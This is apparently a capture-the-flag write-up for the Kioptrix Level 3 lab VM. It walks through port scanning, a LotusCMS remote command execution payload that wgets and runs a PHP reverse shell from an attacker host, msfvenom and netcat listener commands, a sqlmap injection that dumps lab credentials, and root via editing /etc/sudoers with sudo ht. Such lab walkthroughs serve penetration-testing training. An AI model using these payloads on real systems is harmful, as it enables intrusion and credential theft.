Kioptrix: Level 3

This is my writeup for the Kioptrix Level 3 VM from It's considered as easy. The object of the game is to acquire root access via any means possible. There are more ways then one to successfully complete the challenges.

Intelligence Gathering

When scanning the host with nmap we find two open ports

  • 22: OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
  • 80: Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
Starting Nmap 7.60 ( ) at 2017-10-15 12:06 EDT
Nmap scan report for
Host is up (0.0012s latency).
Not shown: 998 closed ports
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
MAC Address: 00:0C:29:F1:E7:C5 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 10.03 seconds

Accessing the host at port 80 we get a web app:



When inspecting the source code, we can find LotusCMS in the meta-tag keywords.


There seems to be a Remote Command Execution vulnerability in this CMS.




If we try to access the gallery link this page is not rendered correctly. This is beacause assets can't be loaded due to the fixed base href. If one read the description, there is a hint.

Important thing with this challenge. Once you find the IP (DHCP Client) edit your hosts file and point it to


So let's create a hosts-entry:

$ echo "__IP__" >> /etc/hosts

When looking at the meta-tag generator we can see Gallarific. What seems to be a gallery web app.

Let's check searchsploit if the exist any known vulnerabilities.




We try to get a shell using the Remote Command Execution:

Create a shell:
$ msfvenom -p php/meterpreter_reverse_tcp LHOST=__IP__ LPORT=__PORT__ -f raw > shell.php

Upload the shell:');shell_exec('wget http://__IP__/php_shell.txt -O /tmp/shell.php;php -f /tmp/shell.php');//

Start listener:
$ nc -nvlp 42

Kick the shell:;include("/tmp/shell.php");//



Let's try the SQL injection from the searchsploit list.
To exploit an SQL injection, we use sqlmap:
TODO: It came to my attention, that sqlmap is forbidden as well. Do this manually.

$ sqlmap -u "" --random-agent --level 5 --risk 3 -D gallery --dump

Table: gallarific_users

username password
admin n0t7t1k4

Table: dev_accounts

username hash password
dreg 0d3eccfb887aabd50f243b3f155c0f85 Mast3r
loneferret 5badcaf789d3d1d09794d8f021f40f0e starwars


A common mistake people make is reuse passwords. In this case loneferret uses the same password for Gallarific and SSH. This allows us to log in to the box.

ssh loneferret@1__IP__

Privilege escalation

We're on the box but with limited access. Next step is to escalate our privileges.
CompanyPolicy.README which is located in loneferret's home directory looks interesting.


The CEO orders users to use sudo ht to view, edit or create files.
What is HT Editor?

This program is a file viewer, editor and analyzer for text, binary, and (especially) executable files.


setuid and setgid (short for "set user ID upon execution" and "set group ID upon execution", respectively) are Unix access rights flags that allow users to run an executable with the permissions of the executable's owner or group respectively and to change behaviour in directories. They are often used to allow users on a computer system to run programs with temporarily elevated privileges in order to perform a specific task. While the assumed user id or group id privileges provided are not always elevated, at a minimum they are specific.

setuid and setgid are needed for tasks that require higher privileges than those which common users have, such as changing their login password.

In this case that means we can view, edit or create any file as root.

Let's try to edit /etc/sudoers.

$ sudo ht -t /etc/sudoers
If we can remove the exclamation mark and change the path to /bin/su, we would be able to run /bin/su which would make us root.

$ sudo ht -t /etc/sudoers (-t for text editor mode)
Edit the file and press ctrl+w


Let's try to run su:


And finally read the flag:


oscp vulnhub writeup spoiler kioptrix